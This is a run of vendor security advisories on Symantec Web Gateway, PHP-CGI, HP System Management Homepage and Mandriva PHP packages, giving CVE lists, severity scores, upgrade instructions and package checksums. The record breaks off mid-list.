to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

Multiple cross-site scripting (XSS) vulnerabilities in the management GUI in Symantec Web Gateway 5.0.x before 5.0.3 allow remote attackers to inject arbitrary web script or HTML via unspecified vectors. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. Symantec Web Gateway (SWG) is a set of network content filtering software developed by Symantec Corporation of the United States. The software provides web content filtering, data loss prevention, and more. ---------------------------------------------------------------------- Become a PSI 3.0 beta tester! Test-drive the new beta version and tell us what you think about its extended automatic update function and significantly enhanced user-interface. Download it here! http://secunia.com/psi_30_beta_launch ---------------------------------------------------------------------- TITLE: Symantec Web Gateway Multiple Vulnerabilities SECUNIA ADVISORY ID: SA49216 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/49216/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=49216 RELEASE DATE: 2012-05-18 DISCUSS ADVISORY: http://secunia.com/advisories/49216/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/49216/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=49216 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: Multiple vulnerabilities have been reported in Symantec Web Gateway, which can be exploited by malicious people to disclose potentially sensitive information, conduct cross-site scripting attacks, manipulate certain data, and compromise a vulnerable system. 1) An unspecified error can be exploited to inject arbitrary commands. No further information is currently available. 2) Certain unspecified input is not properly verified before being used to include files. This can be exploited to include arbitrary files from local or external resources. 3) Certain unspecified input is not properly verified before being used to download or delete arbitrary files. This can be exploited to remove or disclose the contents of arbitrary files. 4) Certain unspecified input is not properly sanitised before being returned to the user. The vulnerabilities are reported in versions prior to 5.0.3. SOLUTION: Update to version 5.0.3. PROVIDED AND/OR DISCOVERED BY: 1-3) The vendor credits Tenable Network Security via ZDI and an anonymous person via SecuriTeam Secure Disclosure. 4) The vendor credits Ajay Pal Singh Atwal and an anonymous person. ORIGINAL ADVISORY: http://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=2012&suid=20120517_00 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ EXPLOIT: Further details available in Customer Area: http://secunia.com/vulnerability_intelligence/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ----------------------------------------------------------------------

php-wrapper.fcgi does not properly handle command-line arguments, which allows remote attackers to bypass a protection mechanism in PHP 5.3.12 and 5.4.2 and execute arbitrary code by leveraging improper interaction between the PHP sapi/cgi/cgi_main.c component and a query string beginning with a +- sequence. PHP is prone to an information-disclosure vulnerability. Exploiting this issue allows remote attackers to view the source code of files in the context of the server process. This may allow the attacker to obtain sensitive information and to run arbitrary PHP code on the affected computer; other attacks are also possible. - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201209-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: High Title: PHP: Multiple vulnerabilities Date: September 24, 2012 Bugs: #384301, #396311, #396533, #399247, #399567, #399573, #401997, #410957, #414553, #421489, #427354, #429630 ID: 201209-03 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities were found in PHP, the worst of which lead to remote execution of arbitrary code. Background ========== PHP is a widely-used general-purpose scripting language that is especially suited for Web development and can be embedded into HTML. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 dev-lang/php < 5.3.15 >= 5.3.15 < 5.4.5 >= 5.4.5 ------------------------------------------------------------------- # Package 1 only applies to users of these architectures: arm Description =========== Multiple vulnerabilities have been discovered in PHP. Please review the CVE identifiers referenced below for details. Workaround ========== There is no known workaround at this time. Resolution ========== All PHP users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/php-5.3.15" All PHP users on ARM should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=dev-lang/php-5.4.5" References ========== [ 1 ] CVE-2011-1398 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-1398 [ 2 ] CVE-2011-3379 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-3379 [ 3 ] CVE-2011-4566 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4566 [ 4 ] CVE-2011-4885 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4885 [ 5 ] CVE-2012-0057 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0057 [ 6 ] CVE-2012-0788 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0788 [ 7 ] CVE-2012-0789 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0789 [ 8 ] CVE-2012-0830 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0830 [ 9 ] CVE-2012-0831 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-0831 [ 10 ] CVE-2012-1172 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1172 [ 11 ] CVE-2012-1823 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-1823 [ 12 ] CVE-2012-2143 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2143 [ 13 ] CVE-2012-2311 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2311 [ 14 ] CVE-2012-2335 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2335 [ 15 ] CVE-2012-2336 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2336 [ 16 ] CVE-2012-2386 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2386 [ 17 ] CVE-2012-2688 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-2688 [ 18 ] CVE-2012-3365 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3365 [ 19 ] CVE-2012-3450 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3450 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201209-03.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2012 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . Please refer to the following Mandriva advisories for further information: MDVA-2012:004, MDVSA-2011:165, MDVSA-2011:166, MDVSA-2011:180, MDVSA-2011:197, MDVSA-2012:065, MDVSA-2012:068, MDVSA-2012:068-1. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Note: the current version of the following document is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/ docDisplay?docId=emr_na-c03839862 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c03839862 Version: 1 HPSBMU02900 rev.1 - HP System Management Homepage (SMH) running on Linux and Windows, Multiple Remote and Local Vulnerabilities NOTICE: The information in this Security Bulletin should be acted upon as soon as possible. Release Date: 2013-07-18 Last Updated: 2013-07-18 Potential Security Impact: Local Denial of Service (DoS), remote Denial of Service (DoS), execution of arbitrary code, gain extended privileges, disclosure of information, unauthorized access, XSS Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP System Management Homepage (SMH) running on Linux and Windows. The vulnerabilities could be exploited remotely resulting in Local Denial of Service (DoS), remote Denial of Service (DoS), execution of arbitrary code, gain privileges, disclosure of information, unauthorized access, or XSS. References: CVE-2011-3389 (SSRT100740) Remote disclosure of information CVE-2012-0883 (SSRT101209) Remote gain extended privileges CVE-2012-2110 (SSRT101210) Remote Denial of Service (DoS) CVE-2012-2311 (SSRT100992) Remote execution of arbitrary code CVE-2012-2329 (SSRT100992) Remote Denial of Service (DoS) CVE-2012-2335 (SSRT100992) Remote execution of arbitrary code CVE-2012-2336 (SSRT100992) Remote Denial of Service (DoS) CVE-2013-2355 (SSRT100696) Remote unauthorized Access CVE-2013-2356 (SSRT100835) Remote disclosure of information CVE-2013-2357 (SSRT100907) Remote Denial of Service (DoS) CVE-2013-2358 (SSRT100907) Remote Denial of Service (DoS) CVE-2013-2359 (SSRT100907) Remote Denial of Service (DoS) CVE-2013-2360 (SSRT100907) Remote Denial of Service (DoS) CVE-2013-2361 (SSRT101007) XSS CVE-2013-2362 (SSRT101076, ZDI-CAN-1676) Local Denial of Service (DoS) CVE-2013-2363 (SSRT101150) Remote disclosure of information CVE-2013-2364 (SSRT101151) XSS CVE-2013-5217 (SSRT101137) Remote unauthorized access SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP System Management Homepage (SMH) v7.2.0 and earlier running on Linux and Windows. BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2011-3389 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2012-0883 (AV:L/AC:M/Au:N/C:C/I:C/A:C) 6.9 CVE-2012-2110 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-2311 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-2329 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2012-2335 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2012-2336 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2013-2355 (AV:N/AC:M/Au:N/C:P/I:N/A:N) 4.3 CVE-2013-2356 (AV:N/AC:L/Au:N/C:C/I:N/A:N) 7.8 CVE-2013-2357 (AV:N/AC:M/Au:S/C:N/I:N/A:C) 6.3 CVE-2013-2358 (AV:N/AC:M/Au:S/C:N/I:N/A:C) 6.3 CVE-2013-2359 (AV:N/AC:M/Au:S/C:N/I:N/A:P) 3.5 CVE-2013-2360 (AV:N/AC:M/Au:S/C:N/I:N/A:P) 3.5 CVE-2013-2361 (AV:N/AC:M/Au:N/C:N/I:P/A:N) 4.3 CVE-2013-2362 (AV:L/AC:H/Au:S/C:N/I:N/A:P) 1.0 CVE-2013-2363 (AV:N/AC:H/Au:N/C:C/I:N/A:P) 6.1 CVE-2013-2364 (AV:N/AC:L/Au:S/C:N/I:N/A:P) 4.0 CVE-2013-5217 (AV:N/AC:H/Au:N/C:P/I:N/A:N) 2.6 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 The Hewlett-Packard Company thanks agix for working with the TippingPoint Zero Day Initiative to report vulnerability CVE-2013-2362 to security-alert@hp.com RESOLUTION HP has made System Management Homepage (SMH) v7.2.1 or subsequent available for Windows and Linux to resolve the vulnerabilities. Information and updates for SMH can be found at the following location: http://h18013.www1.hp.com/products/servers/management/agents/index.html HISTORY Version:1 (rev.1) - 18 July 2013 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin Archive: A list of recently released Security Bulletins is available here: https://h20564.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2013 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. -----BEGIN PGP SIGNATURE----- Version: GnuPG v2.0.19 (GNU/Linux) iEYEARECAAYFAlHoGuMACgkQ4B86/C0qfVmlbwCg5muoKwOcRb0N/+BZa47f7lC9 CCoAoJo1hIDxLxljNZM2GDOcYGgJi1hH =kSG1 -----END PGP SIGNATURE----- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 _______________________________________________________________________ Mandriva Linux Security Advisory MDVSA-2012:068-1 http://www.mandriva.com/security/ _______________________________________________________________________ Package : php Date : May 10, 2012 Affected: 2010.1, 2011. _______________________________________________________________________ Problem Description: A vulnerability has been found and corrected in php(-cgi): PHP-CGI-based setups contain a vulnerability when parsing query string parameters from php files. The updated packages have been patched to correct this issue. Update: It was discovered that the previous fix for the CVE-2012-1823 vulnerability was incomplete (CVE-2012-2335, CVE-2012-2336). The updated packages provides the latest version (5.3.13) which provides a solution to this flaw. _______________________________________________________________________ References: http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-1823 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2335 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2012-2336 https://bugs.php.net/bug.php?id=61910 http://eindbazen.net/2012/05/php-cgi-advisory-cve-2012-1823/ http://www.openwall.com/lists/oss-security/2012/05/09/9 _______________________________________________________________________ Updated Packages: Mandriva Linux 2010.1: 140d36ed5578274826846a0ff7ca05a9 2010.1/i586/apache-mod_php-5.3.13-0.1mdv2010.2.i586.rpm 24775050f82b736c2133fc30f93e809e 2010.1/i586/libphp5_common5-5.3.13-0.1mdv2010.2.i586.rpm f3fb19456fe4b8fd41f4306c007e85fb 2010.1/i586/php-bcmath-5.3.13-0.1mdv2010.2.i586.rpm 99a812ad5970bc37414909de5ef578fa 2010.1/i586/php-bz2-5.3.13-0.1mdv2010.2.i586.rpm 634f717747ee4db7cdd19a93ffd2d5ef 2010.1/i586/php-calendar-5.3.13-0.1mdv2010.2.i586.rpm 3429fa2b956f67b8602489e4b7d3757a 2010.1/i586/php-cgi-5.3.13-0.1mdv2010.2.i586.rpm 51a1d975e31b445ef71901cd04d8fd3a 2010.1/i586/php-cli-5.3.13-0.1mdv2010.2.i586.rpm ba763fffd3798434cb0cde5c8f7a8891 2010.1/i586/php-ctype-5.3.13-0.1mdv2010.2.i586.rpm ebf996e845619b26515e6f3e828c8fbf 2010.1/i586/php-curl-5.3.13-0.1mdv2010.2.i586.rpm ec57b30c43f5678b8cd822fd85df5e34 2010.1/i586/php-dba-5.3.13-0.1mdv2010.2.i586.rpm 85799e72a9511c0f54ff2435fba0aaab 2010.1/i586/php-devel-5.3.13-0.1mdv2010.2.i586.rpm 823c9544385c894e4c5edd1b52bf4e92 2010.1/i586/php-doc-5.3.13-0.1mdv2010.2.i586.rpm 5d753655d5615e92db188468903b8d16 2010.1/i586/php-dom-5.3.13-0.1mdv2010.2.i586.rpm 705fbff48501d08bae719a2d7841d8c2 2010.1/i586/php-enchant-5.3.13-0.1mdv2010.2.i586.rpm 4f78075bddc8fa173a7384e545e3cd5c 2010.1/i586/php-exif-5.3.13-0.1mdv2010.2.i586.rpm e8fefd604fd5006361419135c9059076 2010.1/i586/php-fileinfo-5.3.13-0.1mdv2010.2.i586.rpm bc65e927149d5277ad634b0bad8a868a 2010.1/i586/php-filter-5.3.13-0.1mdv2010.2.i586.rpm ea6a6fd721db888225dfea83a0ad99d9 2010.1/i586/php-fpm-5.3.13-0.1mdv2010.2.i586.rpm 7fb6a2914e72a63ec9401c9662f9bc2b 2010.1/i586/php-ftp-5.3.13-0.1mdv2010.2.i586.rpm 0df19020817d838aba51f052c29f6532 2010.1/i586/php-gd-5.3.13-0.1mdv2010.2.i586.rpm 5ce28c873da3fc5e0feda8e3cad2247a 2010.1/i586/php-gettext-5.3.13-0.1mdv2010.2.i586.rpm acbe524bfc8e156906c70124496a3161 2010.1/i586/php-gmp-5.3.13-0.1mdv2010.2.i586.rpm d03bc0f91411297408ac3dbbd5c426b3 2010.1/i586/php-hash-5.3.13-0.1mdv2010.2.i586.rpm 19bc92bd8b1a4ea4b86b497f5f48933c 2010.1/i586/php-iconv-5.3.13-0.1mdv2010.2.i586.rpm a891fe8d9bcbbfc4458fb31a23720338 2010.1/i586/php-imap-5.3.13-0.1mdv2010.2.i586.rpm edec73af34ecb6b42ed0a14dadb8949d 2010.1/i586/php-ini-5.3.13-0.1mdv2010.2.i586.rpm 529135563f982966be228d0e7055a97d 2010.1/i586/php-intl-5.3.13-0.1mdv2010.2.i586.rpm 2de32f3e7d7da5e06a83f9bf8eac6318 2010.1/i586/php-json-5.3.13-0.1mdv2010.2.i586.rpm 2b4f232c6bd026de886d8199dba4c2f2 2010.1/i586/php-ldap-5.3.13-0.1mdv2010.2.i586.rpm c14fe2ed7cfeb5320fed29676af9e682 2010.1/i586/php-mbstring-5.3.13-0.1mdv2010.2.i586.rpm 606e65e002f946dcf9fa8f7f3950f81d 2010.1/i586/php-mcrypt-5.3.13-0.1mdv2010.2.i586.rpm 84e35a42b7861251869a439b0031f225 2010.1/i586/php-mssql-5.3.13-0.1mdv2010.2.i586.rpm 95caf9f4d272fdeae006851e482a2461 2010.1/i586/php-mysql-5.3.13-0.1mdv2010.2.i586.rpm 5bb6f61f906e8572f66cbbcb0a3a667b 2010.1/i586/php-mysqli-5.3.13-0.1mdv2010.2.i586.rpm 28e5bdd198862a80dfea2ab9e86b9678 2010.1/i586/php-mysqlnd-5.3.13-0.1mdv2010.2.i586.rpm 802e12a27b7256dbba5b9029e7bbb00b 2010.1/i586/php-odbc-5.3.13-0.1mdv2010.2.i586.rpm f3f2b22190a0180e4adddd36ac43b808 2010.1/i586/php-openssl-5.3.13-0.1mdv2010.2.i586.rpm 850ed2a02899e7ef950368f1e6936e7b 2010.1/i586/php-pcntl-5.3.13-0.1mdv2010.2.i586.rpm 128bc6c67ee8960e29c893a0a210f967 2010.1/i586/php-pdo-5.3.13-0.1mdv2010.2.i586.rpm 31d3d8d11a8ec860ff748b4491ed637d 2010.1/i586/php-pdo_dblib-5.3.13-0.1mdv2010.2.i586.rpm 840fd711e567a690f46a5aa686a47019 2010.1/i586/php-pdo_mysql-5.3.13-0.1mdv2010.2.i586.rpm 6b979eef99f357fc4e283c98c5ef96ea 2010.1/i586/php-pdo_odbc-5.3.13-0.1mdv2010.2.i586.rpm 9b5d0ca325bbfcf6b87f74748caceb76 2010.1/i586/php-pdo_pgsql-5.3.13-0.1mdv2010.2.i586.rpm 70c688be75e34b79a9a35462570a2ada 2010.1/i586/php-pdo_sqlite-5.3.13-0.1mdv2010.2.i586.rpm e67f4f8ded56378452b8a548b126266b 2010.1/i586/php-pgsql-5.3.13-0.1mdv2010.2.i586.rpm 4d26258bb774b1d9aff74d3fdc1e3c2c 2010.1/i586/php-phar-5.3.13-0.1mdv2010.2.i586.rpm 74bc08429969529762425997772f8a5d 2010.1/i586/php-posix-5.3.13-0.1mdv2010.2.i586.rpm e697d56093f50bbde693541d67b7566c 2010.1/i586/php-pspell-5.3.13-0.1mdv2010.2.i586.rpm 0fc94be46e664a52fbc9111958cd4146 2010.1/i586/php-readline-5.3.13-0.1mdv2010.2.i586.rpm af7e1bb5a2722063cc52af223dc90787 2010.1/i586/php-recode-5.3.13-0.1mdv2010.2.i586.rpm fee14325fb3a764988c4e2a69c7938b4 2010.1/i586/php-session-5.3.13-0.1mdv2010.2.i586.rpm e89aba4b7dec345be125261046d31b92 2010.1/i586/php-shmop-5.3.13-0.1mdv2010.2.i586.rpm 69f2a66fef9892c0405d3a03c72096b2 2010.1/i586/php-snmp-5.3.13-0.1mdv2010.2.i586.rpm 4db2b4b3d7670603b5922a122dc975aa 2010.1/i586/php-soap-5.3.13-0.1mdv2010.2.i586.rpm e02779584cc1c588d75346f6995ad5a6 2010.1/i586/php-sockets-5.3.13-0.1mdv2010.2.i586.rpm aae3b1c32441f481c49f7f38c1c96294 2010.1/i586/php-sqlite3-5.3.13-0.1mdv2010.2.i586.rpm b4255e1825f289410b71b6a210229b8e 2010.1/i586/php-sqlite-5.3.13-0.1mdv2010.2.i586.rpm dd54ede221fd579f1ebd81be6930010b 2010.1/i586/php-sybase_ct-5.3.13-0.1mdv2010.2.i586.rpm 4bdebc41d1b654e904d39c8f89be51a2 2010.1/i586/php-sysvmsg-5.3.13-0.1mdv2010.2.i586.rpm 3d485895eca51f5f801323baf1f0f8bf 2010.1/i586/php-sysvsem-5.3.13-0.1mdv2010.2.i586.rpm a5c65e02a46da5f9a1be3235565926a3 2010.1/i586/php-sysvshm-5.3.13-0.1mdv2010.2.i586.rpm 1a1e6a0a91388e7113f2774bb0f16c01 2010.1/i586/php-tidy-5.3.13-0.1mdv2010.2.i586.rpm cf565e35c341273ed2b4378c9f0980c8 2010.1/i586/php-tokenizer-5.3.13-0.1mdv2010.2.i586.rpm b1fd12591b6500464a97eb2ae47b2f60 2010.1/i586/php-wddx-5.3.13-0.1mdv2010.2.i586.rpm f0f801ce893ad8eb55bb21d010af641a 2010.1/i586/php-xml-5.3.13-0.1mdv2010.2.i586.rpm 055873d10551544750bd05555cc63155 2010.1/i586/php-xmlreader-5.3.13-0.1mdv2010.2.i586.rpm 69a6e3930ed1b2d1ddac5df5719bc6d6 2010.1/i586/php-xmlrpc-5.3.13-0.1mdv2010.2.i586.rpm de7f360c56f74b036ea924d9f7c76b59 2010.1/i586/php-xmlwriter-5.3.13-0.1mdv2010.2.i586.rpm 4cbd130cf269dd2769dd084322eaf77a 2010.1/i586/php-xsl-5.3.13-0.1mdv2010.2.i586.rpm 1d32b52e968a2bd7c4ff6b640f38ae36 2010.1/i586/php-zip-5.3.13-0.1mdv2010.2.i586.rpm 9508241b048c6acc033c16494f797289 2010.1/i586/php-zlib-5.3.13-0.1mdv2010.2.i586.rpm cd0e0682df60061148366ab6b10394d2 2010.1/SRPMS/apache-mod_php-5.3.13-0.1mdv2010.2.src.rpm f454d177e9bd631df2a4eeca3d33fe38 2010.1/SRPMS/php-5.3.13-0.1mdv2010.2.src.rpm 281be8fe2bb8cd404ade445f64c616da 2010.1/SRPMS/php-ini-5.3.13-0.1mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: 5c32f90215090901240e661f8e2224a9 2010.1/x86_64/apache-mod_php-5.3.13-0.1mdv2010.2.x86_64.rpm c21032781b826fe3a8202eff5b7ef8b5 2010.1/x86_64/lib64php5_common5-5.3.13-0.1mdv2010.2.x86_64.rpm a2d0b2b43aa856d5872679d455e56a1e 2010.1/x86_64/php-bcmath-5.3.13-0.1mdv2010.2.x86_64.rpm 5421084c1b946cb2c5eeebfed07ac829 2010.1/x86_64/php-bz2-5.3.13-0.1mdv2010.2.x86_64.rpm 48aa03dcba36a09689dc6c7f2497741c 2010.1/x86_64/php-calendar-5.3.13-0.1mdv2010.2.x86_64.rpm c503b930c9d60cbd4d4ea58d8a6deda7 2010.1/x86_64/php-cgi-5.3.13-0.1mdv2010.2.x86_64.rpm 228b72cbf197c817d866d1fe3c7ed6b2 2010.1/x86_64/php-cli-5.3.13-0.1mdv2010.2.x86_64.rpm c9435be90a6e5fae1a980109c9bc9aca 2010.1/x86_64/php-ctype-5.3.13-0.1mdv2010.2.x86_64.rpm 0eb2e95722b4af3006f560c8441d687f 2010.1/x86_64/php-curl-5.3.13-0.1mdv2010.2.x86_64.rpm ccebc661c63d1028540c1212de90bbae 2010.1/x86_64/php-dba-5.3.13-0.1mdv2010.2.x86_64.rpm 2edc5f5c47a0ee2bbf001fae9024849f 2010.1/x86_64/php-devel-5.3.13-0.1mdv2010.2.x86_64.rpm 3b3eeb211bf45ede0abaae347d8bc745 2010.1/x86_64/php-doc-5.3.13-0.1mdv2010.2.x86_64.rpm 29f9a4fcee784caeaa54d88ae6f1fda9 2010.1/x86_64/php-dom-5.3.13-0.1mdv2010.2.x86_64.rpm eda0d150731e178912024b0ff6665835 2010.1/x86_64/php-enchant-5.3.13-0.1mdv2010.2.x86_64.rpm cf52bd1d68b75ba6841fe6258b9a1f69 2010.1/x86_64/php-exif-5.3.13-0.1mdv2010.2.x86_64.rpm 0243226aa4bf036a4054b48966f80cf3 2010.1/x86_64/php-fileinfo-5.3.13-0.1mdv2010.2.x86_64.rpm a5bca21277b5c72133340ea059cf0df0 2010.1/x86_64/php-filter-5.3.13-0.1mdv2010.2.x86_64.rpm 3c7007006b1d93d8c96e86dcf27ea38b 2010.1/x86_64/php-fpm-5.3.13-0.1mdv2010.2.x86_64.rpm f9549d4ed2973e5c1519546e971fd81a 2010.1/x86_64/php-ftp-5.3.13-0.1mdv2010.2.x86_64.rpm c7231a7117abab68e8c4d1a3f6a80ccb 2010.1/x86_64/php-gd-5.3.13-0.1mdv2010.2.x86_64.rpm 0ca2c9679c082508a4c2b007ec5a8c46 2010.1/x86_64/php-gettext-5.3.13-0.1mdv2010.2.x86_64.rpm 7d0de98a757251e874aff11ab76db12b 2010.1/x86_64/php-gmp-5.3.13-0.1mdv2010.2.x86_64.rpm 8757a89019988ab9b689c282ae06cf01 2010.1/x86_64/php-hash-5.3.13-0.1mdv2010.2.x86_64.rpm 996f5bcb88fc855db3cc4c779897a9ad 2010.1/x86_64/php-iconv-5.3.13-0.1mdv2010.2.x86_64.rpm 1580fd0ebb4ff0bd0e3c2a6e8925fc8a 2010.1/x86_64/php-imap-5.3.13-0.1mdv2010.2.x86_64.rpm 89a3915683d63a757fa29e53fadf0e1d 2010.1/x86_64/php-ini-5.3.13-0.1mdv2010.2.x86_64.rpm 38115fadfb51fdfd10ea14def4d9143d 2010.1/x86_64/php-intl-5.3.13-0.1mdv2010.2.x86_64.rpm 06aaaa6c43d85283ba31e079f9e1e0e0 2010.1/x86_64/php-json-5.3.13-0.1mdv2010.2.x86_64.rpm b9f6e00a0ac3916b91442ed6c62ad440 2010.1/x86_64/php-ldap-5.3.13-0.1mdv2010.2.x86_64.rpm 9b634f67d80ba028247dafe559276859 2010.1/x86_64/php-mbstring-5.3.13-0.1mdv2010.2.x86_64.rpm bd39ac4808035578dec2e24a98457b03 2010.1/x86_64/php-mcrypt-5.3.13-0.1mdv2010.2.x86_64.rpm 4acc008044469403769de09af155f0d5 2010.1/x86_64/php-mssql-5.3.13-0.1mdv2010.2.x86_64.rpm 8d5826fa6ba3dcaf214839a654e74659 2010.1/x86_64/php-mysql-5.3.13-0.1mdv2010.2.x86_64.rpm ea0e352e2900b493b9d355257ec99a4e 2010.1/x86_64/php-mysqli-5.3.13-0.1mdv2010.2.x86_64.rpm 40b23996dd377b3699ca230f30451e09 2010.1/x86_64/php-mysqlnd-5.3.13-0.1mdv2010.2.x86_64.rpm 4a49bad04937598951093dbf1e57eb19 2010.1/x86_64/php-odbc-5.3.13-0.1mdv2010.2.x86_64.rpm ef337452c999c609f38511b30424aa95 2010.1/x86_64/php-openssl-5.3.13-0.1mdv2010.2.x86_64.rpm 8adda9b3ac67749c4cbbca498fe97042 2010.1/x86_64/php-pcntl-5.3.13-0.1mdv2010.2.x86_64.rpm aab08edd87702937cc87e3eea9683e04 2010.1/x86_64/php-pdo-5.3.13-0.1mdv2010.2.x86_64.rpm b769d4729112be42057acbecc42784fd 2010.1/x86_64/php-pdo_dblib-5.3.13-0.1mdv2010.2.x86_64.rpm 51f45520e81ae006da36c27e9ff23d29 2010.1/x86_64/php-pdo_mysql-5.3.13-0.1mdv2010.2.x86_64.rpm 337fef4ac991f694fbc52f1b51292f0e 2010.1/x86_64/php-pdo_odbc-5.3.13-0.1mdv2010.2.x86_64.rpm ee046601f134c275c1c5394156868176 